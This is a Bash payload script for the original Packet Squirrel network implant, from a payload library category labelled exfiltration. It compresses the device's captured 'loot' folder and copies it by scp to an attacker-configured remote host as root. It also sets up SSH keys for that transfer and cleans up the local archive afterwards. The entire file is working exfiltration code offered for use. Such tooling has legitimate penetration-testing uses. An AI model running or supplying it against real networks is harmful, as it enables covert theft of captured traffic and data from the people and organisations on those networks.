packetsquirrel-payloads/legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh

208 lines
6.3 KiB
Bash

#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: FreeDaNutz
# Description: This payload will compress the loot folder and then send that file to a remote server via scp
# Author: infoskirmish.com
# Version: 1.0
# Category: exfiltration
# Target: Any
# Net Mode: NAT
# LEDs
# FAIL: This payload will LED FAIL (blink RED) for the following reasons
# No USB storage found
# Cannot send files to remote host
# Cannot ping remote host
# ATTACK: Setting NAT: Blink Yellow
# Compressing: Rapid Cyan
# Sending: Rapid Magenta
# Cleaning up: Rapid White
# SUCCESS: LED goes off
exfilhost="xx.xx.xx.xx" # The hostname or ip address you want to send the data to.
exfilhostuser="root" # The username of the account for the above hostname
sshport="22" # Port to send data out on
exfilfile="backup.tar.gz" # The name of the compressed loot folder
identityfile="/root/.ssh/id_rsa" # Path to private identity file on the squirrel
remotepath="/root/$exfilfile" # Path to filename (include file name) on the remote machine.
exfilfilepath="/mnt/$exfilfile" # Location to temp store compressed loot (this gets sent)
lootfolderpath="/mnt/loot" # Path to loot folder
payloadlogpath="/mnt/loot/freedanutz" # Path to store payload log file
# The main run function.
# Inputs: None
# Returns: None
# Upon success it will call the finish() function to shutdown.
function run() {
# Create log directory
# We store the tarball on /mnt outside the /mnt/loot folder in order to make sure we do not use up all the limited space on the device itself.
if [ ! -d $payloadlogpath ]; then
# If log path does not exisit then we should create it.
mkdir -p $payloadlogpath &> /dev/null
fi
# Set networking to NAT mode and wait eight seconds
NETMODE NAT
sleep 8
# If we cannot reach the server we want to send our data to then there is no point in going any further.
ping $exfilhost -w 3 &> /dev/null
pingtest=$?
if [ $pingtest -ne 0 ]; then
debugdata
fail "FATAL ERROR: Cannot reach $exfilhost"
fi
# Let's test to make sure scp keys are set up correclty and we can send files before we send loot.
testssh
# Start blinking LED Cyan very fast to indicate compressing is in progress.
LED C VERYFAST
# Compress the loot folder
echo "tar -czf $exfilfilepath $lootfolderpath" >> $payloadlogpath/log.txt
tar -czf $exfilfilepath $lootfolderpath &> /dev/null
# Start blinking LED Magenta very fast to indicate sending is in progress.
LED M VERYFAST
# Send compress file out into the world.
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath &> /dev/null
# Clean up
finish
}
# A function to clean up files and safely shutdown
# Inputs: None
# Returns: None
function finish() {
# Remove the file we have sent out as it is no longer needed and just taking up space.
echo "Removing $exfilfilepath" >> $payloadlogpath/log.txt
rm $exfilfilepath
sync
# Halt the system; turn off LED
LED OFF
halt
}
# A function to test if the payload can send files to the remote host.
# Inputs: None
# Returns: None
# On test fail will abort script.
function testssh() {
# Create test file.
touch $exfilfilepath.test
scp -P $sshport -C -i $identityfile $exfilfilepath.test $exfilhostuser@$exfilhost:$remotepath &> /dev/null
error=$?
if [ $error -ne 0 ]; then
# We could not send test file; this is a fatal error.
rm $exfilfilepath.test
debugdata
fail "FATAL ERROR: Could not access and/or login to $exfilhostuser@$exfilhost remove path = $remotepath"
else
# Be nice and try to remove the test file we uploaded.
ssh $exfilhostuser@$exfilhost 'rm $remotepath.test'
rm $exfilfilepath.test
fi
}
# A function to standardize how fatal errors fail.
# Inputs: $1:Error message
# Returns: None
# This will abort the script.
function fail() {
LED FAIL
echo $1 >> $payloadlogpath/log.txt
sync
halt
}
# A function to dump data to aid in trouble shooting problems.
# Inputs: None
# Returns: None
function debugdata() {
echo "=== DEBUG DATA ===" >> $payloadlogpath/log.txt
ifconfig >> $payloadlogpath/log.txt
echo "=== Scp Command ===" >> $payloadlogpath/log.txt
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
echo "=== Tar Command ===" >> $payloadlogpath/log.txt
echo "tar -czf $exfilfilepath $lootfolderpath &> /dev/null" >> $payloadlogpath/log.txt
echo "=== Public Key Dump ===" >> $payloadlogpath/log.txt
cat $identityfile.pub >> $payloadlogpath/log.txt
echo "=== Network Config Dump ===" >> $payloadlogpath/log.txt
cat /etc/config/network >> $payloadlogpath/log.txt
echo "=== Ping $exfilhost Results ===" >> $payloadlogpath/log.txt
echo "If there is no data it likely means that $exfilhost is a bad address." >> $payloadlogpath/log.txt
ping $exfilhost -w 3 >> $payloadlogpath/log.txt
echo "=== lsusb Dump ===" >> $payloadlogpath/log.txt
lsusb >> $payloadlogpath/log.txt
}
# Zero out payload log file.
echo "" > $payloadlogpath/log.txt
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Check to see if the .ssh folder exists. If it does not exist then create it.
if [ ! -d "/root/.ssh" ]; then
# If it doesn't then we need to create it.
echo "Warning: /root/.ssh folder did not exits. We created it." >> $payloadlogpath/log.txt
mkdir -p /root/.ssh &> /dev/null
fi
# Check if identity file exists. If not create it.
if [ ! -f $identityfile ]; then
# We need to log a warning that since the identify file was not found then this payload likely will fail. This payload will give the user a likely way to fix this problem.
echo "Warning: We had to create $identityfile" >> $payloadlogpath/log.txt
echo "To complete setup you'll likely need to run this command on the squirrel (make sure when you do your squirrel can access $exfilhost)" >> $payloadlogpath/log.txt
echo "cat $identityfile.pub | ssh $exfilhostuser@$exfilhost 'cat >> .ssh/authorized_keys'" >> $payloadlogpath/log.txt
ssh-keygen -t rsa -N "" -f $identityfile
fi
LED ATTACK
run
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
payloadlogpath="log.txt"
debugdata
fail "Could not load USB storage. Stopping..."
fi